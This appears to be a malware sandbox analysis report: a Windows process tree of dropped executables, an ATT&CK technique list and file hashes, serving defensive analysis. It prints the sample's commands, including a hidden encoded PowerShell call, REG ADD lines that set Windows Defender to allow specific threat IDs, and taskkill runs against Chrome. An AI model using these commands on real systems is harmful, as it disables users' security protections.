    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:292912
- C:\Users\Admin\Pictures\Adobe Films\ALkiWtwf2N31vVqskVzdBiTO.exe
  "C:\Users\Admin\Pictures\Adobe Films\ALkiWtwf2N31vVqskVzdBiTO.exe"
  2⤵
  - Executes dropped EXE
  - Checks computer location settings
  PID:4580
- - C:\Users\Admin\Pictures\Adobe Films\ALkiWtwf2N31vVqskVzdBiTO.exe
    "C:\Users\Admin\Pictures\Adobe Films\ALkiWtwf2N31vVqskVzdBiTO.exe" -hq
    3⤵
    - Executes dropped EXE
    PID:56308
- C:\Users\Admin\Pictures\Adobe Films\CwA699rBCmpjgwId2ztJaClQ.exe
  "C:\Users\Admin\Pictures\Adobe Films\CwA699rBCmpjgwId2ztJaClQ.exe"
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:2116

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3488 -ip 3488
1⤵
PID:68352

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3488 -ip 3488
1⤵
PID:132296

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
1⤵
- Process spawned unexpected child process
PID:4200
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
  2⤵
  - Loads dropped DLL
  PID:135292
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 135292 -s 600
    3⤵
    - Program crash
    PID:153532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 135292 -ip 135292
1⤵
PID:142864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3488 -ip 3488
1⤵
PID:172728

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 201064 -ip 201064
1⤵
PID:292304

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 3488 -ip 3488
1⤵
PID:293124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 201064 -ip 201064
1⤵
PID:293492

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3488 -ip 3488
1⤵
PID:293500

C:\Users\Admin\AppData\Local\Temp\9BF0.exe
C:\Users\Admin\AppData\Local\Temp\9BF0.exe
1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:293648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 201064 -ip 201064
1⤵
PID:292900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3488 -ip 3488
1⤵
PID:4844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 201064 -ip 201064
1⤵
PID:3868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 3488 -ip 3488
1⤵
PID:1856

C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\B45B.dll
1⤵
PID:1208
- C:\Windows\SysWOW64\regsvr32.exe
  /s C:\Users\Admin\AppData\Local\Temp\B45B.dll
  2⤵
  - Loads dropped DLL
  PID:3044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 201064 -ip 201064
1⤵
PID:4164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3488 -ip 3488
1⤵
PID:936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 2192 -ip 2192
1⤵
PID:1764

C:\Users\Admin\AppData\Local\Temp\BD74.exe
C:\Users\Admin\AppData\Local\Temp\BD74.exe
1⤵
- Executes dropped EXE
PID:4176

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 201064 -ip 201064
1⤵
PID:3112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 3488 -ip 3488
1⤵
PID:3616

C:\Users\Admin\AppData\Local\Temp\CA46.exe
C:\Users\Admin\AppData\Local\Temp\CA46.exe
1⤵
- Executes dropped EXE
PID:5124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4084 -ip 4084
1⤵
PID:5140

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:5196

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 201064 -ip 201064
1⤵
PID:5300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 3488 -ip 3488
1⤵
PID:5372

C:\Users\Admin\AppData\Local\Temp\E0FC.exe
C:\Users\Admin\AppData\Local\Temp\E0FC.exe
1⤵
PID:5720
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 5720 -s 848
  2⤵
  - Program crash
  PID:6156

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
PID:5780

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 516 -p 5720 -ip 5720
1⤵
PID:6128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 201064 -ip 201064
1⤵
PID:6180

C:\Users\Admin\AppData\Local\Temp\2604.exe
C:\Users\Admin\AppData\Local\Temp\2604.exe
1⤵
PID:6336
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c taskkill /f /im chrome.exe
  2⤵
  PID:8436
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im chrome.exe
    3⤵
    - Kills process with taskkill
    PID:8860
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe"
  2⤵
  PID:9472
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa51cc4f50,0x7ffa51cc4f60,0x7ffa51cc4f70
    3⤵
    PID:9516
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1552,2647502107170906731,3821246741572561593,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1648 /prefetch:2
    3⤵
    PID:10044
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1552,2647502107170906731,3821246741572561593,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1980 /prefetch:8
    3⤵
    PID:10064
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1552,2647502107170906731,3821246741572561593,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2232 /prefetch:8
    3⤵
    PID:4624
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1552,2647502107170906731,3821246741572561593,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3112 /prefetch:1
    3⤵
    PID:10500
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1552,2647502107170906731,3821246741572561593,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2984 /prefetch:1
    3⤵
    PID:10484
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1552,2647502107170906731,3821246741572561593,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3544 /prefetch:1
    3⤵
    PID:10620
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1552,2647502107170906731,3821246741572561593,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3968 /prefetch:1
    3⤵
    PID:10744
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1552,2647502107170906731,3821246741572561593,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4696 /prefetch:8
    3⤵
    PID:12228
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1552,2647502107170906731,3821246741572561593,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4868 /prefetch:8
    3⤵
    PID:12372
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1552,2647502107170906731,3821246741572561593,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5032 /prefetch:8
    3⤵
    PID:12900
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1552,2647502107170906731,3821246741572561593,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4884 /prefetch:8
    3⤵
    PID:13032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 201064 -ip 201064
1⤵
PID:6792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 6484 -ip 6484
1⤵
PID:6948

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:8776

C:\Users\Admin\AppData\Local\Temp\3AF5.exe
C:\Users\Admin\AppData\Local\Temp\3AF5.exe
1⤵
PID:8996
- C:\Users\Admin\AppData\Local\Temp\3AF5.exe
  "C:\Users\Admin\AppData\Local\Temp\3AF5.exe" -h -q
  2⤵
  PID:9376

C:\Users\Admin\AppData\Local\Temp\4A96.exe
C:\Users\Admin\AppData\Local\Temp\4A96.exe
1⤵
PID:9652

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:10224

C:\Users\Admin\AppData\Local\Temp\692B.exe
C:\Users\Admin\AppData\Local\Temp\692B.exe
1⤵
PID:12524

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
1⤵
- Process spawned unexpected child process
PID:12572
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
  2⤵
  PID:12608
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 12608 -s 600
    3⤵
    - Program crash
    PID:12908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 12608 -ip 12608
1⤵
PID:12712

C:\Users\Admin\AppData\Local\Temp\7ED7.exe
C:\Users\Admin\AppData\Local\Temp\7ED7.exe
1⤵
PID:13096
- C:\Users\Admin\AppData\Local\Temp\7ED7.exe
  "C:\Users\Admin\AppData\Local\Temp\7ED7.exe" -h -q
  2⤵
  PID:13364

C:\Users\Admin\AppData\Local\Temp\BInNSjlobDuvYZgQA\dWABRBnWrovPiXF\wHHkdaf.exe
C:\Users\Admin\AppData\Local\Temp\BInNSjlobDuvYZgQA\dWABRBnWrovPiXF\wHHkdaf.exe Yz /site_id 525403 /S
1⤵
PID:13348
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:13424
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:13932
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:14024
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:14076
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:14132
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:14164
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:14212
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:14200
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:14240
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:14276
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:14288
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:14324
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:14312
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:14300
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:14264
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:14252
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:14380
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:14400
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:14424
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:14412
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:14436
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:14448
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:14460
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:14472
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:14488
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:14504

C:\Users\Admin\AppData\Local\Temp\A135.exe
C:\Users\Admin\AppData\Local\Temp\A135.exe
1⤵
PID:13820
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c taskkill /f /im chrome.exe
  2⤵
  PID:14088
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im chrome.exe
    3⤵
    - Kills process with taskkill
    PID:14156

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
1⤵
- Process spawned unexpected child process
PID:13896
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
  2⤵
  PID:13908
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 13908 -s 604
    3⤵
    - Program crash
    PID:13988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 13908 -ip 13908
1⤵
PID:13952

C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe" --nt-service -f "C:\Users\Admin\AppData\Local\Temp\csrss\tor\torrc" --Log "notice file C:\Users\Admin\AppData\Local\Temp\csrss\tor\log.txt"
1⤵
PID:14520

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

File and Directory Permissions Modification

Impair Defenses

Modify Registry

Scripting

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

Filesize
717B

MD5
ec8ff3b1ded0246437b1472c69dd1811

SHA1
d813e874c2524e3a7da6c466c67854ad16800326

SHA256
e634c2d1ed20e0638c95597adf4c9d392ebab932d3353f18af1e4421f4bb9cab

SHA512
e967b804cbf2d6da30a532cbc62557d09bd236807790040c6bee5584a482dc09d724fc1d9ac0de6aa5b4e8b1fff72c8ab3206222cc2c95a91035754ac1257552

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

Filesize
1KB

MD5
45c6dea60de2234fee76e9ded9da30e5

SHA1
21372d7c2f6505cf8e406a80840d718acac53987

SHA256
900fc2066a7dd18ed562c8c5729c01ead1c78a1f91ef88b9ae9158be2626c9d2

SHA512
b4242aa87b8ecce04ca64e83a67c5ab4b4980526e85b5015c19df955bdcc0c8be4a3644564aefb756b13da314188f939ddc2b09a84b25033422e3e5182c7a8f9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

Filesize
192B

MD5
77d86cb3314ab569fd5d094d537f8935

SHA1
bc7d60a2b86b2370b21f66ab9ad05288c96e05a3

SHA256
93c80541f58c1f5b789460fd3236d7bfa943d56836ff643419acebb9b9247939

SHA512
5c0bb156dc334d45d4fe66f7b39723abcce2c497537eab59c0a56b83c15dd3b717b8e05bc6347e193c68ae1fdc8f6fbe0a3b7cc7c93b04849f5a3bc3fdf3b55d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

Filesize
408B

MD5
8387cfdcf57dba6d1f95e65f52019312

SHA1
dabf8ca5aa790e3fb48ae178b4dceadc1a824ec0

SHA256
7d7b88baac834a535b1453f6cc2ed459743d796140c92ae141beacdd02be0d31

SHA512
9b22cd25d38d207d927ff6e755f88c4d67df3bb518f77f30641493975162d91228ff2ee24fbbdabf5e36a50d6d2ce6111d658d9c5e31a8e50298af056bc38229

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\H7L84LM088BFFC0.exe.log

Filesize
42B

MD5
84cfdb4b995b1dbf543b26b86c863adc

SHA1
d2f47764908bf30036cf8248b9ff5541e2711fa2

SHA256
d8988d672d6915b46946b28c06ad8066c50041f6152a91d37ffa5cf129cc146b

SHA512
